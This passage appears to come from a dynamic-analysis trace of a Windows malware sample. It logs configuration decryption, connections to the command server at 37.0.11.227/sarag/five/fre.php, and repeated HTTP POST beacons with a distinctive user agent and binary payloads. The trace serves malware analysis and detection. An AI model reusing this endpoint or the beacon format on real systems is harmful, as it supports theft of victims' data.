lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0296.659] GetProcessHeap () returned 0x690000 [0296.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0296.659] closesocket (s=0x9a0) returned 0 [0296.660] GetProcessHeap () returned 0x690000 [0296.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0296.660] GetProcessHeap () returned 0x690000 [0296.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0296.660] GetProcessHeap () returned 0x690000 [0296.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0296.660] GetProcessHeap () returned 0x690000 [0296.661] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0296.661] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1310) returned 0x9a0 [0296.664] Sleep (dwMilliseconds=0xea60) [0296.666] GetProcessHeap () returned 0x690000 [0296.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0296.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.667] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.676] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0296.692] GetProcessHeap () returned 0x690000 [0296.692] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0296.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.693] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0296.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.694] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.695] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.695] GetProcessHeap () returned 0x690000 [0296.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0296.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.696] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0296.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.697] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0296.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.700] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0296.700] GetProcessHeap () returned 0x690000 [0296.700] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0296.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.701] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0296.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.751] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0296.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.753] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0296.754] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.754] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0296.754] GetProcessHeap () returned 0x690000 [0296.754] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0296.754] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0296.757] GetProcessHeap () returned 0x690000 [0296.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0296.758] GetProcessHeap () returned 0x690000 [0296.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0296.758] GetProcessHeap () returned 0x690000 [0296.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0296.760] GetProcessHeap () returned 0x690000 [0296.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0296.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.761] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.769] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0296.774] GetProcessHeap () returned 0x690000 [0296.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0296.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.775] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0296.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.778] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.779] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.779] GetProcessHeap () returned 0x690000 [0296.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0296.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.780] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0296.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.781] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0296.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.782] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0296.782] GetProcessHeap () returned 0x690000 [0296.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0296.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.783] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0296.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.784] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0296.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.784] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0296.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.785] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0296.786] GetProcessHeap () returned 0x690000 [0296.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0296.786] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0296.786] GetProcessHeap () returned 0x690000 [0296.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0296.786] socket (af=2, type=1, protocol=6) returned 0x9a4 [0296.786] connect (s=0x9a4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0296.814] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0296.814] GetProcessHeap () returned 0x690000 [0296.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0296.814] GetProcessHeap () returned 0x690000 [0296.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0296.814] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0296.815] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0296.815] GetProcessHeap () returned 0x690000 [0296.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0296.815] GetProcessHeap () returned 0x690000 [0296.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0296.816] GetProcessHeap () returned 0x690000 [0296.816] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0296.816] GetProcessHeap () returned 0x690000 [0296.816] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0296.817] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0296.817] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0296.817] GetProcessHeap () returned 0x690000 [0296.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0296.818] GetProcessHeap () returned 0x690000 [0296.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0296.818] send (s=0x9a4, buf=0x6ad508*, len=242, flags=0) returned 242 [0296.819] send (s=0x9a4, buf=0x6aba40*, len=159, flags=0) returned 159 [0296.819] GetProcessHeap () returned 0x690000 [0296.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0296.819] recv (in: s=0x9a4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0296.891] GetProcessHeap () returned 0x690000 [0296.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0296.892] GetProcessHeap () returned 0x690000 [0296.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0296.892] GetProcessHeap () returned 0x690000 [0296.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0296.893] GetProcessHeap () returned 0x690000 [0296.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0296.894] closesocket (s=0x9a4) returned 0 [0296.894] GetProcessHeap () returned 0x690000 [0296.894] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0296.894] GetProcessHeap () returned 0x690000 [0296.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0296.895] GetProcessHeap () returned 0x690000 [0296.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0296.895] GetProcessHeap () returned 0x690000 [0296.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0296.896] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5d8) returned 0x9a4 [0296.898] Sleep (dwMilliseconds=0xea60) [0296.899] GetProcessHeap () returned 0x690000 [0296.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0296.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.900] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.908] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0296.915] GetProcessHeap () returned 0x690000 [0296.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0296.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.916] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0296.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.917] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.919] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.919] GetProcessHeap () returned 0x690000 [0296.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0296.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.924] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0296.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.928] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0296.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.929] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0296.929] GetProcessHeap () returned 0x690000 [0296.929] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0296.929] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.929] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0296.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.931] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0296.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.932] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0296.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.933] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0296.933] GetProcessHeap () returned 0x690000 [0296.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0296.933] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0296.933] GetProcessHeap () returned 0x690000 [0296.933] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0296.934] GetProcessHeap () returned 0x690000 [0296.934] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0296.936] GetProcessHeap () returned 0x690000 [0296.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0296.936] GetProcessHeap () returned 0x690000 [0296.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0296.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.937] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0296.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.942] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0296.949] GetProcessHeap () returned 0x690000 [0296.949] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0296.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.950] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0296.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.951] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0296.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.951] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0296.951] GetProcessHeap () returned 0x690000 [0296.952] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0296.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.953] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0296.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.954] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0296.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0296.955] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0296.955] GetProcessHeap () returned 0x690000 [0296.955] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0296.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.956] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0296.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.958] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0296.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.959] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0296.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0296.960] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0296.960] GetProcessHeap () returned 0x690000 [0296.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0296.960] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0296.960] GetProcessHeap () returned 0x690000 [0296.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0296.960] socket (af=2, type=1, protocol=6) returned 0x9a8 [0296.961] connect (s=0x9a8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0296.987] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0296.987] GetProcessHeap () returned 0x690000 [0296.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0296.987] GetProcessHeap () returned 0x690000 [0296.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0296.988] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0296.988] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0296.988] GetProcessHeap () returned 0x690000 [0296.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0296.988] GetProcessHeap () returned 0x690000 [0296.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0296.989] GetProcessHeap () returned 0x690000 [0296.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0296.989] GetProcessHeap () returned 0x690000 [0296.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0296.990] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0296.992] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0296.992] GetProcessHeap () returned 0x690000 [0296.992] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0296.992] GetProcessHeap () returned 0x690000 [0296.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0296.992] send (s=0x9a8, buf=0x6ad508*, len=242, flags=0) returned 242 [0296.993] send (s=0x9a8, buf=0x6aba40*, len=159, flags=0) returned 159 [0296.993] GetProcessHeap () returned 0x690000 [0296.993] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0296.993] recv (in: s=0x9a8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0297.059] GetProcessHeap () returned 0x690000 [0297.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0297.059] GetProcessHeap () returned 0x690000 [0297.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0297.060] GetProcessHeap () returned 0x690000 [0297.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0297.060] GetProcessHeap () returned 0x690000 [0297.061] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0297.061] closesocket (s=0x9a8) returned 0 [0297.062] GetProcessHeap () returned 0x690000 [0297.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0297.062] GetProcessHeap () returned 0x690000 [0297.062] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0297.062] GetProcessHeap () returned 0x690000 [0297.063] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0297.063] GetProcessHeap () returned 0x690000 [0297.063] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0297.063] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1370) returned 0x9a8 [0297.065] Sleep (dwMilliseconds=0xea60) [0297.069] GetProcessHeap () returned 0x690000 [0297.069] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0297.070] 